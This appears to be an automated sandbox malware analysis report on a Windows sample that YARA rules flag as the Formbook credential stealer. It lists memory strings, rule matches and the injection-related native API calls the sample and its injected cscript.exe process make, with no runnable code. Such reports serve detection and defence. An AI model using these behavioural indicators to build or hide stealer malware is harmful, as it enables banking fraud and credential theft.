          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000012.00000002.496418412.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2
          Source: WXs8v9QuE7.exe, 00000000.00000002.233934690.000000000075A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004181D0 NtCreateFile,1_2_004181D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00418280 NtReadFile,1_2_00418280
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00418300 NtClose,1_2_00418300
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,1_2_004183B0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004181CE NtCreateFile,1_2_004181CE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041827A NtReadFile,1_2_0041827A
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004183AB NtAllocateVirtualMemory,1_2_004183AB
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AD98F0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AD9860
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,1_2_00AD9840
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,1_2_00AD99A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AD9910
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,1_2_00AD9A20
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AD9A00
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,1_2_00AD9A50
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,1_2_00AD95D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,1_2_00AD9540
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AD96E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AD9660
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AD97A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AD9780
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AD9FE0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AD9710
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD98A0 NtWriteVirtualMemory,1_2_00AD98A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9820 NtEnumerateKey,1_2_00AD9820
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADB040 NtSuspendThread,1_2_00ADB040
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD99D0 NtCreateProcessEx,1_2_00AD99D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9950 NtQueueApcThread,1_2_00AD9950
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A80 NtOpenDirectoryObject,1_2_00AD9A80
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A10 NtQuerySection,1_2_00AD9A10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA3B0 NtGetContextThread,1_2_00ADA3B0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9B00 NtSetValueKey,1_2_00AD9B00
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD95F0 NtQueryInformationFile,1_2_00AD95F0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9520 NtWaitForSingleObject,1_2_00AD9520
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADAD30 NtSetContextThread,1_2_00ADAD30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9560 NtWriteFile,1_2_00AD9560
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD96D0 NtCreateKey,1_2_00AD96D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9610 NtEnumerateValueKey,1_2_00AD9610
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9670 NtQueryInformationProcess,1_2_00AD9670
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9650 NtQueryValueKey,1_2_00AD9650
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9730 NtQueryVirtualMemory,1_2_00AD9730
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA710 NtOpenProcessToken,1_2_00ADA710
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9760 NtOpenProcess,1_2_00AD9760
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9770 NtSetInformationFile,1_2_00AD9770
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA770 NtOpenThread,1_2_00ADA770
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004181D0 NtCreateFile,1_1_004181D0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_00418280 NtReadFile,1_1_00418280
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_00418300 NtClose,1_1_00418300
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004183B0 NtAllocateVirtualMemory,1_1_004183B0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004181CE NtCreateFile,1_1_004181CE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041827A NtReadFile,1_1_0041827A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B95D0 NtClose,LdrInitializeThunk,18_2_048B95D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9540 NtReadFile,LdrInitializeThunk,18_2_048B9540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B96D0 NtCreateKey,LdrInitializeThunk,18_2_048B96D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_048B96E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9650 NtQueryValueKey,LdrInitializeThunk,18_2_048B9650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_048B9660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,18_2_048B9780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,18_2_048B9FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,18_2_048B9710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9840 NtDelayExecution,LdrInitializeThunk,18_2_048B9840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,18_2_048B9860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B99A0 NtCreateSection,LdrInitializeThunk,18_2_048B99A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_048B9910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A50 NtCreateFile,LdrInitializeThunk,18_2_048B9A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B95F0 NtQueryInformationFile,18_2_048B95F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9520 NtWaitForSingleObject,18_2_048B9520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BAD30 NtSetContextThread,18_2_048BAD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9560 NtWriteFile,18_2_048B9560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9610 NtEnumerateValueKey,18_2_048B9610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9670 NtQueryInformationProcess,18_2_048B9670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B97A0 NtUnmapViewOfSection,18_2_048B97A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA710 NtOpenProcessToken,18_2_048BA710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9730 NtQueryVirtualMemory,18_2_048B9730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9760 NtOpenProcess,18_2_048B9760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA770 NtOpenThread,18_2_048BA770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9770 NtSetInformationFile,18_2_048B9770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B98A0 NtWriteVirtualMemory,18_2_048B98A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B98F0 NtReadVirtualMemory,18_2_048B98F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9820 NtEnumerateKey,18_2_048B9820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BB040 NtSuspendThread,18_2_048BB040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B99D0 NtCreateProcessEx,18_2_048B99D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9950 NtQueueApcThread,18_2_048B9950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A80 NtOpenDirectoryObject,18_2_048B9A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A00 NtProtectVirtualMemory,18_2_048B9A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A10 NtQuerySection,18_2_048B9A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A20 NtResumeThread,18_2_048B9A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA3B0 NtGetContextThread,18_2_048BA3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9B00 NtSetValueKey,18_2_048B9B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005781D0 NtCreateFile,18_2_005781D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00578280 NtReadFile,18_2_00578280
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00578300 NtClose,18_2_00578300
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005783B0 NtAllocateVirtualMemory,18_2_005783B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005781CE NtCreateFile,18_2_005781CE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057827A NtReadFile,18_2_0057827A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005783AB NtAllocateVirtualMemory,18_2_005783AB
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004047D30_2_004047D3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004061D40_2_004061D4
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C0A91_2_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C1CD1_2_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B9921_2_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041A3021_2_0041A302
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C3831_2_0041C383
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00408C6B1_2_00408C6B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B4B31_2_0041B4B3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041BD9E1_2_0041BD9E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A01_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B620A81_2_00B620A8
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB0901_2_00AAB090
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B510021_2_00B51002
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB41201_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9F9001_2_00A9F900
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B622AE1_2_00B622AE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACEBB01_2_00ACEBB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62B281_2_00B62B28
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA841F1_2_00AA841F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC25811_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E01_2_00AAD5E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A90D201_2_00A90D20
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62D071_2_00B62D07
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61D551_2_00B61D55
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62EF71_2_00B62EF7
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB6E301_2_00AB6E30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61FF11_2_00B61FF1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041C0A91_1_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041C1CD1_1_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041B9921_1_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041A3021_1_0041A302
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488841F18_2_0488841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493D46618_2_0493D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A258118_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049425DD18_2_049425DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E018_2_0488D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942D0718_2_04942D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04870D2018_2_04870D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941D5518_2_04941D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942EF718_2_04942EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493D61618_2_0493D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04896E3018_2_04896E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494DFCE18_2_0494DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941FF118_2_04941FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B09018_2_0488B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A018_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049420A818_2_049420A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049428EC18_2_049428EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493100218_2_04931002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494E82418_2_0494E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487F90018_2_0487F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489412018_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049422AE18_2_049422AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FA2B18_2_0492FA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AEBB018_2_048AEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493DBD218_2_0493DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049303DA18_2_049303DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942B2818_2_04942B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057A30218_2_0057A302
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00568C7018_2_00568C70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00568C6B18_2_00568C6B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562D9018_2_00562D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562D8718_2_00562D87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562FB018_2_00562FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: String function: 00A9B150 appears 35 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0487B150 appears 45 times
          Source: WXs8v9QuE7.exe, 00000000.00000003.228374222.0000000009AAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
